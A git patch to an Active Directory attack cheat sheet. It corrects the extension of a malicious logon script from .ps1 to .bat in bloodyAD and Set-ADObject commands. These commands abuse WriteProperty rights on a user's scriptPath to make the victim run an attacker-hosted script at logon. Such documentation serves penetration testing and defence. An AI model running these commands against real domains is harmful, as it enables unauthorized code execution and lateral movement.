From dce118cea39a70ab59f3135c476edbe96d0bae71 Mon Sep 17 00:00:00 2001 From: Mozhar Alhosni Date: Fri, 15 Mar 2024 21:21:16 +0800 Subject: [PATCH] Update ad-adds-acl-ace.md ScriptPath ([scriptPath](https://learn.microsoft.com/en-us/windows/win32/adschema/a-scriptpath)/[msTSInitialProgram](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/7f65d267-8a3f-4070-b94a-111e793d4821)) does NOT support `PowerShell` files, see the below links for more on what extensions can it run: - https://redmondmag.com/articles/2016/02/09/logon-scripts-for-active-directory.aspx - https://www.rlmueller.net/LogonScriptFAQ.htm#What%20languages%20can%20I%20use%20for%20logon%20scripts --- docs/active-directory/ad-adds-acl-ace.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/docs/active-directory/ad-adds-acl-ace.md b/docs/active-directory/ad-adds-acl-ace.md index 6188055..0a721e1 100644 --- a/docs/active-directory/ad-adds-acl-ace.md +++ b/docs/active-directory/ad-adds-acl-ace.md @@ -105,11 +105,11 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr * WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : * Windows/Linux: ```ps1 - bloodyAD --host 10.0.0.5 -d example.lab -u attacker -p 'Password123*' set object delegate scriptpath -v '\\10.0.0.5\totallyLegitScript.ps1' + bloodyAD --host 10.0.0.5 -d example.lab -u attacker -p 'Password123*' set object delegate scriptpath -v '\\10.0.0.5\totallyLegitScript.bat' ``` * Windows only: ```ps1 - Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1" + Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.bat" ``` ### Group @@ -255,4 +255,4 @@ An attacker can change the password of the user this ACE applies to: * [ACE to RCE - @JustinPerdok - July 24, 2020](https://sensepost.com/blog/2020/ace-to-rce/) * [Access Control Entries (ACEs) - The Hacker Recipes - @_nwodtuhs](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces) -* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) \ No newline at end of file +* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)